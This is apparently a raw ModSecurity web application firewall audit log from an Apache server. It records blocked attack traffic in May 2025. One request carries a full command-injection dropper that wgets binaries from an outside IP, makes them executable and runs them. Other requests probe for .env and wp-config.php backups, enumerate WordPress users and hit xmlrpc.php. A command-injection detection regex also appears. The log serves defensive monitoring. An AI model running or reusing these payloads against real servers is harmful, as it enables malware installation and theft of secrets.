Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.x86;chmod 777 g4za.x86;./g4za.x86 jawsgr;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.arm7;chmod 777 g4za.arm7;./g4za.arm7 jawsgr: cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.x86 chmod 777 g4za.x86 ./g4za.x86 jawsgr cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.arm7 chmod 777 g4za.arm7 ./g4za.arm7 jawsgr"] [severity Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746536585948055 14512 (- - -) Stopwatch2: 1746536585948055 14512; combined=25529, p1=504, p2=272, p3=0, p4=0, p5=12391, sr=73, sw=0, l=0, gc=12362 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3399eb6b-Z-- --aa82eb3c-A-- [06/May/2025:20:06:36 +0700] aBoJXL5Kt25brCRGiyhsygAAABY 103.236.140.4 35908 103.236.140.4 8181 --aa82eb3c-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsgr;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsgr HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.142 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --aa82eb3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa82eb3c-E-- --aa82eb3c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.x86;chmod 777 g4za.x86;./g4za.x86 jawsgr;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.arm7;chmod 777 g4za.arm7;./g4za.arm7 jawsgr: cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.x86 chmod 777 g4za.x86 ./g4za.x86 jawsgr cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.arm7 chmod 777 g4za.arm7 ./g4za.arm7 jawsgr"] [severity Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746536796361326 2161 (- - -) Stopwatch2: 1746536796361326 2161; combined=757, p1=463, p2=263, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa82eb3c-Z-- --fbe33940-A-- [06/May/2025:20:50:33 +0700] aBoTqXQ-FFoo6luwbxL0rAAAAM4 103.236.140.4 36366 103.236.140.4 8181 --fbe33940-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 167.99.210.137 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --fbe33940-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbe33940-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746539433376774 826 (- - -) Stopwatch2: 1746539433376774 826; combined=296, p1=260, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbe33940-Z-- --75e58d18-A-- [06/May/2025:22:09:04 +0700] aBomEL5Kt25brCRGiyh0CgAAAAQ 103.236.140.4 59310 103.236.140.4 8181 --75e58d18-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 139.59.136.184 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --75e58d18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75e58d18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746544144607124 784 (- - -) Stopwatch2: 1746544144607124 784; combined=324, p1=287, p2=0, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75e58d18-Z-- --cccd0466-A-- [06/May/2025:22:31:11 +0700] aBorP1odKr7jV1iEMs8dVwAAAJA 103.236.140.4 40376 103.236.140.4 8181 --cccd0466-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.89.112.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.89.112.162 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --cccd0466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cccd0466-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746545471847730 826 (- - -) Stopwatch2: 1746545471847730 826; combined=365, p1=288, p2=0, p3=0, p4=0, p5=77, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cccd0466-Z-- --c22f8c16-A-- [06/May/2025:22:36:28 +0700] aBosfFodKr7jV1iEMs8dsAAAAIQ 103.236.140.4 42492 103.236.140.4 8181 --c22f8c16-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.4 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c22f8c16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c22f8c16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746545788568473 3016 (- - -) Stopwatch2: 1746545788568473 3016; combined=1381, p1=449, p2=900, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c22f8c16-Z-- --c54d963d-A-- [06/May/2025:22:36:31 +0700] aBosf1odKr7jV1iEMs8dsgAAAIc 103.236.140.4 42510 103.236.140.4 8181 --c54d963d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c54d963d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c54d963d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746545791043040 3101 (- - -) Stopwatch2: 1746545791043040 3101; combined=1481, p1=469, p2=975, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c54d963d-Z-- --6f500c5c-A-- [06/May/2025:22:36:33 +0700] aBosgVodKr7jV1iEMs8dtAAAAIg 103.236.140.4 42514 103.236.140.4 8181 --6f500c5c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.4 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6f500c5c-C-- demo.sayHello --6f500c5c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f500c5c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746545793451192 5165 (- - -) Stopwatch2: 1746545793451192 5165; combined=3922, p1=503, p2=3188, p3=26, p4=25, p5=103, sr=112, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f500c5c-Z-- --16c17061-A-- [06/May/2025:22:36:47 +0700] aBosj1odKr7jV1iEMs8dyAAAAJQ 103.236.140.4 42612 103.236.140.4 8181 --16c17061-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.4 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --16c17061-C-- demo.sayHello --16c17061-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --16c17061-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746545807270820 6421 (- - -) Stopwatch2: 1746545807270820 6421; combined=4656, p1=615, p2=3791, p3=31, p4=42, p5=104, sr=91, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16c17061-Z-- --156e1f61-A-- [06/May/2025:23:04:07 +0700] aBoy93Q-FFoo6luwbxIAZwAAANU 103.236.140.4 53078 103.236.140.4 8181 --156e1f61-B-- GET /wp-config.php-orig HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 89.46.110.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.46.110.107 X-Forwarded-Proto: http Connection: close Accept: */* --156e1f61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --156e1f61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746547447193182 891 (- - -) Stopwatch2: 1746547447193182 891; combined=317, p1=275, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --156e1f61-Z-- --4becd238-A-- [06/May/2025:23:04:09 +0700] aBoy-b8Q_AFo5EvzOKvm4gAAAEM 103.236.140.4 53096 103.236.140.4 8181 --4becd238-B-- GET /wp-config.php_orig HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 94.152.11.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.152.11.127 X-Forwarded-Proto: http Connection: close Accept: */* --4becd238-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4becd238-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746547449021075 772 (- - -) Stopwatch2: 1746547449021075 772; combined=327, p1=285, p2=0, p3=0, p4=0, p5=41, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4becd238-Z-- --f34e6146-A-- [06/May/2025:23:27:40 +0700] aBo4fL5Kt25brCRGiyh9yQAAABY 103.236.140.4 37006 103.236.140.4 8181 --f34e6146-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.182.25.63 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.182.25.63 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept-Charset: utf-8 --f34e6146-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f34e6146-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746548860763161 732 (- - -) Stopwatch2: 1746548860763161 732; combined=301, p1=261, p2=0, p3=0, p4=0, p5=40, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f34e6146-Z-- --17042e24-A-- [07/May/2025:00:46:03 +0700] aBpK23Q-FFoo6luwbxIKVAAAANg 103.236.140.4 40214 103.236.140.4 8181 --17042e24-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 68.183.9.16 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 68.183.9.16 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --17042e24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17042e24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746553563832243 889 (- - -) Stopwatch2: 1746553563832243 889; combined=357, p1=319, p2=0, p3=0, p4=0, p5=38, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17042e24-Z-- --51fd3e2b-A-- [07/May/2025:01:46:51 +0700] aBpZG75Kt25brCRGiyiQAQAAAAo 103.236.140.4 45710 103.236.140.4 8181 --51fd3e2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 163.5.32.186 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 163.5.32.186 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --51fd3e2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51fd3e2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746557211018820 792 (- - -) Stopwatch2: 1746557211018820 792; combined=310, p1=273, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51fd3e2b-Z-- --c09e2c5b-A-- [07/May/2025:02:44:24 +0700] aBpmmL8Q_AFo5EvzOKsD7wAAAFc 103.236.140.4 45156 103.236.140.4 8181 --c09e2c5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.90 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c09e2c5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c09e2c5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746560664400176 3140 (- - -) Stopwatch2: 1746560664400176 3140; combined=1329, p1=449, p2=848, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c09e2c5b-Z-- --aa18bf60-A-- [07/May/2025:02:44:26 +0700] aBpmmr8Q_AFo5EvzOKsD8QAAAEo 103.236.140.4 45172 103.236.140.4 8181 --aa18bf60-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa18bf60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa18bf60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746560666850434 2998 (- - -) Stopwatch2: 1746560666850434 2998; combined=1220, p1=409, p2=783, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa18bf60-Z-- --32f30a4c-A-- [07/May/2025:02:44:29 +0700] aBpmnb8Q_AFo5EvzOKsD-QAAAFE 103.236.140.4 45204 103.236.140.4 8181 --32f30a4c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.90 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --32f30a4c-C-- demo.sayHello --32f30a4c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --32f30a4c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746560669263225 6981 (- - -) Stopwatch2: 1746560669263225 6981; combined=4963, p1=571, p2=4080, p3=41, p4=42, p5=130, sr=76, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32f30a4c-Z-- --7447de63-A-- [07/May/2025:02:44:43 +0700] aBpmq78Q_AFo5EvzOKsEBAAAAEU 103.236.140.4 45312 103.236.140.4 8181 --7447de63-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.90 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7447de63-C-- demo.sayHello --7447de63-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7447de63-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 